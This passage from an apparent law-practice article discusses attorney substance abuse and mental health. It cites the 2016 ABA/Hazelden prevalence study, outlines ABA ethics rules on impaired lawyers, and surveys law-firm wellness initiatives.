In his case, he was simply distracted by everything – he had lost the ability to focus. Everything distracted him – the turbulent politics of our time, sports, online games, social media. He could no longer keep his nose to the grindstone and get his work done. He was ignoring emails, missing deadlines, failing to call clients back or respond to their email – and very much afraid of getting in disciplinary trouble. Fortunately, there are confidential resources in his state and we were able to persuade him to contact those resources.

ATTORNEY IMPAIRMENT

The ABA, in conjunction with the Hazelden Betty Ford Foundation, funded a large study dealing with attorneys and substances abuse. The Journal of Addiction Medicine published “The Prevalence of Substance Use and Other Mental Health Concerns Among American Attorneys” in 2016. The study surveyed nearly 13,000 attorneys.

Some of the findings: 20.6 percent reported problematic drinking, 31.9 percent of them attorneys age 30 or younger.

Of those who used drugs, both legal and illegal, respondents reported using stimulants the most—74.1 percent. Additionally, of those who used drugs, 51.3 percent of respondents reported using sedatives, 46.8 percent tobacco, 31 percent used marijuana and 21.6 percent used opioids.

It should be noted that this study relied on the attorneys self-reporting. Only 3,419 lawyers out of 14,895 surveyed answered questions about drug use. Peter Krill, one of the authors of the study, remarked: “It’s left to speculation what motivated 75 percent of attorneys to skip over the section on drug use as if it wasn’t there.”

The most common mental health concerns were:

• Anxiety, 61.1 percent.
• Depression, 45.7 percent.
• Social anxiety, 16.1 percent.
• Attention deficit hyperactivity disorder, 12.5 percent.
• Panic disorder, 8 percent.
• Bipolar disorder, 2.4 percent.

How did those with alcohol and drug problems feel about getting treatment? The main concern, and it is huge, is confidentiality. Only 6.8 percent sought treatment and of those who did, only 21.8 percent went through a program designed for legal professionals.

ETHICAL MISSTEPS MAY INDICATE A PROBLEM

In many cases, the actions an attorney takes (or perhaps inactions) can lead to professional discipline or malpractice AND indicate the presence of mental illness or a substance use disorder.

Examples? An attorney could demonstrate a pattern of conduct – missed deadlines, missed appointments, last-minute requests for continuances, frequent absenteeism, failing to return client phone calls or respond to mail, co-mingling or inappropriately taking client trust funds, or making false representations. The attorney may also demonstrate behaviors at work that appear different from their prior functioning. For example, an attorney may become socially withdrawn, procrastinate, have unpredictable and frequent mood swings, demonstrate unwarranted anger or hostility, and seek to point the finger at others for personal failings.

Any of these behaviors may be the product of depression, anxiety, neurological dysfunction, gambling addiction and/or substance use disorder.

As indicated above, anxiety and depression are the two most common mental health problems affecting attorneys.

A depressed attorney may demonstrate low motivation, an absence of energy, fatigue, and difficulty concentrating. The attorney may take a long time to learn something new or to respond to client calls or answer mail. The attorney may not respond to important emails, mail, or phone calls out of panic or fear.

The lawyer may procrastinate and leave a job unfinished for someone else to complete, come into work late, leave early, or not come into the office at all for several days. They may file motions or briefs that omit important details because the attorney could not concentrate and could not remember specific information.

Work could be completed late, or not completed, and would likely contain major mistakes. If the lawyer’s supervisor gave negative feedback, the depressed attorney may respond with anger and irritability. To this attorney, everything would sound like criticism, resulting in angry responses or blaming others for mistakes.

If the supervisor asked the lawyer to redo something or to correct a problem, the lawyer might feel overwhelmed and too stressed to manage. This attorney’s ability to tolerate stress and cope with the everyday demands of clients, partners, opposing counsel, or judges becomes severely compromised to the point where the lawyer is unable to practice competently.

WHEN MUST A LAWYER WITHDRAW OR BE REMOVED FROM CLIENT REPRESENTATION?

Rule 1.16 (a)(2) prohibits a lawyer representing or continuing to represent a client where “the lawyer’s physical or mental condition materially impairs the lawyer’s ability to represent the client.”

In Formal Opinion 03-429 (Obligations with Respect to Mentally Impaired Lawyer in the Firm), the ABA Standing Committee on Ethics and Professional Responsibility writes, “Simply stated, mental impairment does not lessen a lawyer’s obligation to provide clients with competent representation.” The opinion does provide some direction: “[W]hen considering what must be done when confronted with evidence of a lawyer’s apparent mental disorder or substance abuse, it may be helpful for partners or supervising lawyers to consult with an experienced psychiatrist, psychologist, or other appropriately trained mental health professional.”

An initial referral generally includes consultation with a state Lawyer Assistance Program (LAP), which most states now have. Many programs are run by volunteers or other attorneys who are in recovery. LAP programs differ widely in what services they can provide, so check to see what your state’s organization is able to offer. Some LAPs merely provide referrals to mental health professionals in the community, while others may have mental health professionals on staff. Most LAPs are not able to provide a fitness to practice evaluation. In those cases, a referral to a forensics psychologist will be needed.

It is very common for impaired attorneys to need a month undergoing treatment with subsequent treatment thereafter.

These treatments often have good outcomes, with a combination of therapy and medications. This protects clients, the firm reputation and may save the lives of impaired lawyers. As we well know, the financial burden on a small firm may be significant – no hours billed and continuing to pay salary, benefits, etc. And of course, there is never a guarantee that the underlying impairment will be cured.

Sadly, sometimes a law firm must act. As the opinion says,

“If the mental impairment of a lawyer has resulted in a violation of the Model Rules, an obligation may exist to report the violation to the appropriate professional authority. If the firm removes the impaired lawyer in a matter, it may have an obligation to discuss with the client the circumstances surrounding the change of responsibility. If the impaired lawyer resigns or is removed from the firm, the firm may have disclosure obligations to clients who are considering whether to continue to use the firm or shift their relationship to the departed lawyer, but must be careful to limit any statements made to ones for which there is a factual foundation. The obligation to report a violation of the Model Rules by an impaired lawyer is not eliminated by departure of the impaired lawyer.”

PROMOTING LAWYER WELLNESS – BEGINNING TO ADDRESS THE PROBLEM

How do firms nurture lawyers and help them stay well? The answer to that is complicated, but it is refreshing to see that more and more firms are committed to finding a path that encourages lawyer wellness. Here is some of what we’ve seen:

• Law firm physical fitness centers (greatly loved by lawyers)
• Space for yoga or meditation
• Non-alcohol events – or at least events where there is a choice of beverages
• Training/education sessions/retreats about wellness, including stress reduction, meditation, self-care, team building, etc.
• Policies which encourage employees to come forward for treatment without being afraid of losing their jobs
• Setting a maximum for billable hours and lowering the minimum required
• Special training for partners in creating a culture of wellness and how they can help
• For larger firms, hiring a Director of Wellness has become common
• To make sure lawyers are ready to come back to work and to perform competently, firms are requiring verification of participation in a treatment program, requiring that the lawyer commit to sticking with the program, and agree to alcohol and drug screens where appropriate

PROMOTING LAWYER WELLNESS – EVOLVING STEPS TO ADDRESS THE PROBLEM

We did a little research on 2019 steps taken by law firms to address lawyer wellness. While some steps echo the beginning steps above, some are innovative.

Law firms, particularly large firms, are offering CLE wellness courses, bringing in speakers and also offering online resources to help with stress or substance abuse. The resources are often available via firm intranet or through custom apps.

Firms have offered clubs ranging from knitting to running and events like “bike to work week.” Reed Smith highlighted the connection between art and wellness and established a program encouraging its employee to create and exhibit art – as well as viewing art in the firm’s offices around the world.

Firms are creating mocktails for retreats and functions – and they sound pretty appealing! New terminology and imagery are being employed. For Cooley, “cocktails and conversation” is no longer used – ditto for images of martini glasses and champagne flutes promoting events.

Unsurprisingly, there has been an emphasis on mindfulness and meditation, with firms offering training, guided meditation sessions, and subscriptions to meditation apps.

Employee assistance programs have bloomed, offering help for those with addiction problems, financial stress, relationship difficulties and other crises. Most programs are provided by a third-party vendor with interactions taking place via phone, video counseling, online chats or even face-to-face.

Some firms are bringing in counselors on a regular basis – and the sessions are confidential. This seems to be successful as appointments fill up quickly.

Knowing how helpful it can be to have symptoms of a colleague’s struggle recognized, some firms are providing mental health first aid training, making sure that staff, attorneys and managing partners know the symptoms of depression, anxiety and substance abuse.

There has been a sudden rash of hiring to fill a new position: Director of Well-Being. As you might imagine, this is more likely to happen at larger firms. As of June 2019, 11 of 40 large firms had someone exclusively working on a firm wellness program.

FINAL THOUGHTS

The National Task Force on Lawyer Well-Being concluded, in part: “To preserve the public’s trust and maintain our status as a self-regulating profession, we must truly become “our brothers’ and sisters’ keepers,” through a strong commitment to caring for the well-being of one another, as well as ourselves.”

As of August, 2019, Bloomberg Law reported that 29 states have established working groups or task forces, and revised regulations related to continuing legal education (CLE) programming and to bar admissions. Virginia modified Rule 1.1 to add a comment specifically addressing lawyer well-being:

“7] A lawyer’s mental, emotional, and physical well-being impacts the lawyer’s ability to represent clients and to make responsible choices in the practice of law. Maintaining the mental, emotional, and physical ability necessary for the representation of a client is an important aspect of maintaining competence to practice law.”

Systemic progress is happening. Still, it is legitimate to ask whether the efforts by law firms outlined above are “enough” or whether there is a real commitment to them. Let’s face it, billable hours have been the holy grail for a very long time. While skepticism is fair, we think firms recognize (maybe for the first time) the true extent and cost of impaired lawyers. That recognition, coupled with a commitment to provide effective and confidential help to lawyers in need of assistance, is a good sign of what we hope will be a long-term effort to make sure that lawyer wellness is a core concern of every law firm and legal entity.